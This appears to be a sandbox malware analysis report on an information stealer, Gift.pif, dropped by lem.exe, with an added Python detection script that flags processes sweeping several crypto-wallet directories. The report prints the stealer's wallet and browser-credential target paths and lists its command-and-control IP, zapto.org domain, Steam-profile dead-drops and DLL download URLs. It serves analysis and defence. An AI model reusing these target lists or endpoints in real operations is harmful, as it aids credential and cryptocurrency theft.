                        Source: Gift.pif, 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif — File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif — File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif — File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif — File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif — File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif — File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif — File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif — File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif — File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif — File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif — File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif — File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif — File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif — File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif — File opened: C:\Users\user\AppData\Roaming\Exodus\
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif — File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif — File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif — File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif — File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif — File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif — File opened: C:\Users\user\AppData\Roaming\Binance\
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif — File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif — File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif — File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif — File opened: C:\Users\user\AppData\Roaming\Ledger Live\
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif — File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif — File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif — File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif — File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                        Source: Gift.pifBinary or memory string: WIN_81
                        Source: Gift.pifBinary or memory string: WIN_XP
                        Source: Gift.pifBinary or memory string: WIN_XPe
                        Source: Gift.pifBinary or memory string: WIN_VISTA
                        Source: Gift.pifBinary or memory string: WIN_7
                        Source: Gift.pifBinary or memory string: WIN_8
                        Source: Gift.pif.2.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 4USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                        Source: Yara matchFile source: 0000000B.00000002.3217998328.000000000484E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Gift.pif PID: 748, type: MEMORYSTR
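The "File opened" entries above are the behavioural fingerprint behind the "Tries to steal Crypto Currency Wallets" verdict: one process (Gift.pif, PID 748) walks the storage directories of ten different wallet products inside a few seconds, which no legitimate wallet ever does. The following detection is an added example written for this page, not Joe Sandbox code or part of the report: it maps file-access events to the wallet families whose directories the report lists, then alerts on any process that touches three or more distinct families inside a sliding time window. The sample telemetry, timestamps, the Exodus and backup-agent image paths and the allowlist are constructed for the example; widening Exodus, Ledger Live, atomic_qt and Guarda to their application roots is my generalisation of the subdirectories the report shows.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Wallet storage locations taken from the report's "File opened" entries,
# expressed as paths below %USERPROFILE%\AppData and grouped by wallet family.
# Widening Exodus, Ledger Live, atomic_qt and Guarda to their application root
# is my generalisation; the report only shows the subdirectories.
WALLET_DIRS = {
    "Electrum-LTC": r"roaming\electrum-ltc\wallets",
    "Exodus": r"roaming\exodus",
    "ElectronCash": r"roaming\electroncash\wallets",
    "MultiDoge": r"roaming\multidoge",
    "Atomic": r"roaming\atomic\local storage\leveldb",
    "Binance": r"roaming\binance",
    "Coinomi": r"local\coinomi\coinomi\wallets",
    "Ledger Live": r"roaming\ledger live",
    "atomic_qt": r"roaming\atomic_qt",
    "Guarda": r"roaming\guarda",
}
# Images allowed to sweep many profile directories (backup agents etc.).
# Constructed for the example; fill from your own environment.
ALLOWLIST = {r"c:\program files\backupagent\backup.exe"}
_APPDATA = re.compile(r"\\appdata\\(.+)$")


def wallet_family(path):
    """Return the wallet family a file path belongs to, or None."""
    norm = path.replace("/", "\\").lower().rstrip("\\")
    m = _APPDATA.search(norm)
    if not m:
        return None
    rel = m.group(1)
    for family, prefix in WALLET_DIRS.items():
        if rel == prefix or rel.startswith(prefix + "\\"):
            return family
    return None


def detect_wallet_sweeps(events, window_s=60, min_families=3):
    """One alert per (pid, image) that opens paths of >= min_families distinct
    wallet families within any window_s seconds. Each event is a dict with
    ts (datetime), pid, image and path."""
    window = timedelta(seconds=window_s)
    hits = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        fam = wallet_family(e["path"])
        if fam is None or e["image"].lower() in ALLOWLIST:
            continue
        hits[(e["pid"], e["image"])].append((e["ts"], fam))
    alerts = []
    for (pid, image), seq in hits.items():
        start = 0
        for end in range(len(seq)):
            while seq[end][0] - seq[start][0] > window:
                start += 1  # slide the window forward
            if len({f for _, f in seq[start:end + 1]}) >= min_families:
                alerts.append({"pid": pid, "image": image,
                               "families": sorted({f for _, f in seq}),
                               "first": seq[0][0], "last": seq[-1][0]})
                break
    return alerts


# --- constructed sample telemetry -------------------------------------------
GIFT = r"C:\Users\user\AppData\Local\Temp\366791\Gift.pif"  # from the report
EXODUS = r"C:\Program Files\Exodus\Exodus.exe"              # assumed path
BACKUP = r"C:\Program Files\BackupAgent\backup.exe"         # assumed path
U = r"C:\Users\user\AppData"
# The distinct directories the report lists under "File opened" for Gift.pif.
REPORT_PATHS = [
    U + r"\Roaming\Electrum-LTC\wallets", U + r"\Roaming\Exodus",
    U + r"\Roaming\Exodus\exodus.wallet", U + r"\Roaming\Exodus\backups",
    U + r"\Roaming\ElectronCash\wallets", U + r"\Roaming\MultiDoge",
    U + r"\Roaming\atomic\Local Storage\leveldb", U + r"\Roaming\Binance",
    U + r"\Local\Coinomi\Coinomi\wallets",
    U + r"\Roaming\Ledger Live\Local Storage\leveldb",
    U + r"\Roaming\Ledger Live\Session Storage", U + r"\Roaming\Ledger Live",
    U + r"\Roaming\atomic_qt\config", U + r"\Roaming\atomic_qt\exports",
    U + r"\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb",
    U + r"\Roaming\Guarda\Local Storage\leveldb",
]
BASE = datetime(2024, 8, 5, 12, 0, 0)  # constructed timestamps


def _ev(sec, pid, image, path):
    return {"ts": BASE + timedelta(seconds=sec), "pid": pid, "image": image, "path": path}


SAMPLE_EVENTS = (
    # Gift.pif (PID 748 in the report) sweeping every wallet directory in 16 s
    [_ev(i, 748, GIFT, p) for i, p in enumerate(REPORT_PATHS)]
    + [_ev(1, 748, GIFT, r"C:\Windows\System32\kernel32.dll")]  # non-wallet path: ignored
    # a wallet application touching only its own data: one family, no alert
    + [_ev(5, 1200, EXODUS, U + r"\Roaming\Exodus\exodus.wallet\seed.seco"),
       _ev(6, 1200, EXODUS, U + r"\Roaming\Exodus\backups")]
    # three families, but spread over ten minutes: outside the 60 s window
    + [_ev(100, 3300, r"C:\Windows\explorer.exe", U + r"\Roaming\Binance"),
       _ev(400, 3300, r"C:\Windows\explorer.exe", U + r"\Roaming\MultiDoge"),
       _ev(700, 3300, r"C:\Windows\explorer.exe", U + r"\Roaming\Guarda\Local Storage\leveldb")]
    # an allowlisted backup agent sweeping the same directories
    + [_ev(20 + i, 900, BACKUP, p) for i, p in enumerate(REPORT_PATHS)]
)

if __name__ == "__main__":
    for a in detect_wallet_sweeps(SAMPLE_EVENTS):
        print(f"pid {a['pid']} {a['image']}: {len(a['families'])} wallet families "
              f"between {a['first'].time()} and {a['last'].time()}: {', '.join(a['families'])}")
```

Only the Gift.pif process fires: the wallet application stays inside one family, the backup agent is allowlisted, and explorer.exe touches three families but not inside one window. Raising window_s to 900 makes the slow sweep fire too, which is the tuning knob to think about when the stealer adds its own sleeps between directories.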

                        Remote Access Functionality

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: 11.3.Gift.pif.4688da0.11.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.Gift.pif.1722008.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.3.Gift.pif.16a2810.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.Gift.pif.465b598.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.3.Gift.pif.465b598.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.Gift.pif.465b598.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.Gift.pif.46e0000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.Gift.pif.4688da0.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.3.Gift.pif.465b598.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.3.Gift.pif.4688da0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.Gift.pif.4688da0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.3.Gift.pif.465b598.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.Gift.pif.1722008.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.3.Gift.pif.465b598.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000003.2544771101.000000000465B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3217998328.00000000046E1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000003.2544847220.0000000001676000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3217806128.0000000004688000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3217998328.000000000484E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000003.2545299732.000000000465B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000003.2544400162.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3217806128.00000000045E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3217461443.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000003.2544656418.00000000016AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000003.2544847220.00000000016A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000003.2545299732.0000000004688000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000003.2544427666.000000000465C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000003.2544576964.00000000046E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Gift.pif PID: 748, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Code function: 11_2_0034696E socket, WSAGetLastError, bind, listen, WSAGetLastError, closesocket
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Code function: 11_2_00346E32 socket, WSAGetLastError, bind, WSAGetLastError, closesocket
MITRE ATT&CK matrix, listed per tactic column. Bracketed digits are the hit-count badges exactly as the report renders them; entries without a badge are the unmatched cells of the matrix template.

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology, IP Addresses
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising, Compromise Infrastructure
Initial Access: Valid Accounts [2], Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise
Execution: Windows Management Instrumentation [11], Native API [2], At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter, PowerShell
Persistence: DLL Side-Loading [1], Valid Accounts [2], Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron
Privilege Escalation: Exploitation for Privilege Escalation [1], DLL Side-Loading [1], Valid Accounts [2], Access Token Manipulation [21], Process Injection [12], RC Scripts, Startup Items, Scheduled Task/Job, At, Cron
Defense Evasion: Disable or Modify Tools [11], Deobfuscate/Decode Files or Information [1], Obfuscated Files or Information [2], Software Packing [1], DLL Side-Loading [1], Masquerading [121], Valid Accounts [2], Virtualization/Sandbox Evasion [1], Access Token Manipulation [21], Process Injection [12]
Credential Access: OS Credential Dumping [2], Input Capture [21], Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing
Discovery: System Time Discovery [2], Account Discovery [1], File and Directory Discovery [3], System Information Discovery [27], Security Software Discovery [51], Virtualization/Sandbox Evasion [1], Process Discovery [4], Application Window Discovery [1], System Owner/User Discovery [1], Network Service Discovery
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections, Shared Webroot
Collection: Archive Collected Data [1], Data from Local System [4], Input Capture [21], Clipboard Data [3], Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging
Command and Control: Ingress Tool Transfer [2], Encrypted Channel [11], Non-Application Layer Protocol [3], Application Layer Protocol [114], Fallback Channels, Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot [1], Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement, External Defacement
Behavior Graph ID: 1488222 | Sample: lem.exe | Startdate: 05/08/2024 | Architecture: WINDOWS | Score: 100

Resolved or contacted hosts: steamcommunity.com; arpdabl.zapto.org; KLUpntqKswLWgWJpHbymfJYffqy.KLUpntqKswLWgWJpHbymfJYffqy

Signatures on the sample: Found malware configuration; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 6 other signatures

Process tree (the number after a process name is the report's created-files/registry-values counter for that process):

lem.exe (63) started
    signature: Found stalling execution ending in API Sleep call
    cmd.exe (2) started
        dropped: C:\Users\user\AppData\Local\Temp\...\Gift.pif, PE32
        signature: Drops PE files with a suspicious file extension
        Gift.pif (57) started
            network: 188.245.87.202, TCP 443 (local ports 49713, 49715), PARSONLINETehran-IRANIR, Iran (ISLAMIC Republic Of)
            network: arpdabl.zapto.org 38.180.132.96, TCP 80 (local port 49752), COGENT-174US, United States
            network: steamcommunity.com 104.102.49.249, TCP 443 (local port 49712), AKAMAI-ASUS, United States
            dropped: C:\ProgramData\vcruntime140.dll, PE32; C:\ProgramData\softokn3.dll, PE32; C:\ProgramData\nss3.dll, PE32; 4 other files (none is malicious)
            signatures: Found many strings related to Crypto-Wallets (likely being stolen); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc); Tries to steal Crypto Currency Wallets
            cmd.exe (1) started
                conhost.exe started
                timeout.exe (1) started
        cmd.exe (2) started
        conhost.exe started
        7 other processes

Initial sample:
Source | Detection | Scanner | Label
lem.exe | 55% | ReversingLabs | Win32.Trojan.Generic

Dropped files:
Source | Detection | Scanner | Label
C:\ProgramData\CBKJJJDHDGDA\GDAAKK | 0% | ReversingLabs |
C:\ProgramData\freebl3.dll | 0% | ReversingLabs |
C:\ProgramData\mozglue.dll | 0% | ReversingLabs |
C:\ProgramData\msvcp140.dll | 0% | ReversingLabs |
C:\ProgramData\nss3.dll | 0% | ReversingLabs |
C:\ProgramData\softokn3.dll | 0% | ReversingLabs |
C:\ProgramData\vcruntime140.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\366791\Gift.pif | 7% | ReversingLabs |

Unpacked PE files: No Antivirus matches
Domains: No Antivirus matches
URLs:
Source | Detection | Scanner | Label
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743. | 0% | URL Reputation | safe
http://www.valvesoftware.com/legal.htm | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | 0% | URL Reputation | safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | 0% | URL Reputation | safe
http://www.mozilla.com/en-US/blocklist/ | 0% | URL Reputation | safe
https://mozilla.org0/ | 0% | URL Reputation | safe
http://nsis.sf.net/NSIS_ErrorError | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 0% | URL Reputation | safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL | 0% | URL Reputation | safe
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref | 0% | URL Reputation | safe
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477 | 0% | URL Reputation | safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
https://store.steampowered.com/about/ | 0% | URL Reputation | safe
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
https://steamcommunity.com/?subsection=broadcasts | 0% | Avira URL Cloud | safe
https://store.steampowered.com/subscriber_agreement/ | 0% | Avira URL Cloud | safe
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=zGRpBs82SFHJ&a | 0% | Avira URL Cloud | safe
https://188.245.87.202/msvcp140.dll | 0% | Avira URL Cloud | safe
http://arpdabl.FCBFIEGCAE | 0% | Avira URL Cloud | safe
http://arpdabl.zapto.org/TH | 0% | Avira URL Cloud | safe
https://store.steampowered.c | 0% | Avira URL Cloud | safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=Dbzy | 0% | Avira URL Cloud | safe
https://help.steampowered.com/en/ | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
http://www.sqlite.org/copyright.html. | 0% | URL Reputation | safe
https://store.steampowered.com/ | 0% | URL Reputation | safe
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta | 0% | URL Reputation | safe
https://188.245.87.202/vcruntime140.dll1J | 0% | Avira URL Cloud | safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | 0% | Avira URL Cloud | safe
http://arpdabl.zapto.GCAE | 0% | Avira URL Cloud | safe
https://www.autoitscript.com/autoit3/ | 0% | Avira URL Cloud | safe
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp | 0% | Avira URL Cloud | safe
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp; | 0% | Avira URL Cloud | safe
https://188.245.87.202/ | 0% | Avira URL Cloud | safe
https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&amp;l=english | 0% | Avira URL Cloud | safe
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&amp;l=english | 0% | Avira URL Cloud | safe
https://steamcommunity.com/profiles/76561199747278259/badges | 100% | Avira URL Cloud | malware
https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&amp;l=en | 0% | Avira URL Cloud | safe
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL | 0% | Avira URL Cloud | safe
http://arpdabl.zaptoEGCAE | 0% | Avira URL Cloud | safe
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english | 0% | Avira URL Cloud | safe
https://188.245.87.202/softokn3.dll | 0% | Avira URL Cloud | safe
https://188.245.87.202KJD | 0% | Avira URL Cloud | safe
http://www.autoitscript.com/autoit3/J | 0% | Avira URL Cloud | safe
http://store.steampowered.com/privacy_agreement/ | 0% | Avira URL Cloud | safe
https://store.steampowered.com/points/shop/ | 0% | Avira URL Cloud | safe
https://t.me/armad2a | 100% | Avira URL Cloud | malware
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.0 | 0% | Avira URL Cloud | safe
https://188.245.87.202/vcruntime140.dll | 0% | Avira URL Cloud | safe
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg | 0% | Avira URL Cloud | safe
https://store.steampowered.com/privacy_agreement/ | 0% | Avira URL Cloud | safe
https://community.akam
ai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0 | 0% | Avira URL Cloud | safe
https://188.245.87.202/mozglue.dll | 0% | Avira URL Cloud | safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am | 0% | Avira URL Cloud | safe
https://steamcommunity.com/profiles/76561199747278259 | 100% | Avira URL Cloud | malware
https://188.245.87.202/nss3.dll | 0% | Avira URL Cloud | safe
http://arpdabl.zapto.org | 0% | Avira URL Cloud | safe
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english | 0% | Avira URL Cloud | safe
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english | 0% | Avira URL Cloud | safe
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis | 0% | Avira URL Cloud | safe
https://188.245.87.202/freebl3.dll | 0% | Avira URL Cloud | safe
https://188.245.87.202/sqls.dll | 0% | Avira URL Cloud | safe
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC | 0% | Avira URL Cloud | safe
https://t.me/armad2ahellosqls.dllsqlite3.dllIn | 0% | Avira URL Cloud | safe
https://steamcommunity.com/my/wishlist/ | 0% | Avira URL Cloud | safe
https://188.245.87.202/V; | 0% | Avira URL Cloud | safe
https://steamcommunity.com/market/ | 0% | Avira URL Cloud | safe
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi | 0% | Avira URL Cloud | safe
https://store.steampowered.com/news/ | 0% | Avira URL Cloud | safe
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=Q4LAS9-JZwft&amp;l=e | 0% | Avira URL Cloud | safe
http://store.steampowered.com/subscriber_agreement/ | 0% | Avira URL Cloud | safe
https://188.245.87.202/nss3.dllG | 0% | Avira URL Cloud | safe
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en | 0% | Avira URL Cloud | safe
https://steamcommunity.com/profiles/76561199747278259/inventory/ | 100% | Avira URL Cloud | malware
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org | 0% | Avira URL Cloud | safe
http://arpdabl.zapto | 0% | Avira URL Cloud | safe
https://188.245.87.202/_; | 0% | Avira URL Cloud | safe
https://store.steampowered.com/stats/ | 0% | Avira URL Cloud | safe
https://188.245.87.202 | 0% | Avira URL Cloud | safe
http://arpdabl.zapto.org/ | 0% | Avira URL Cloud | safe
https://steamcommunity.com/discussions/ | 0% | Avira URL Cloud | safe
http://store.steampowered.com/privacy_agreemen | 0% | Avira URL Cloud | safe
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1 | 0% | Avira URL Cloud | safe
https://steamcommunity.com/workshop/ | 0% | Avira URL Cloud | safe
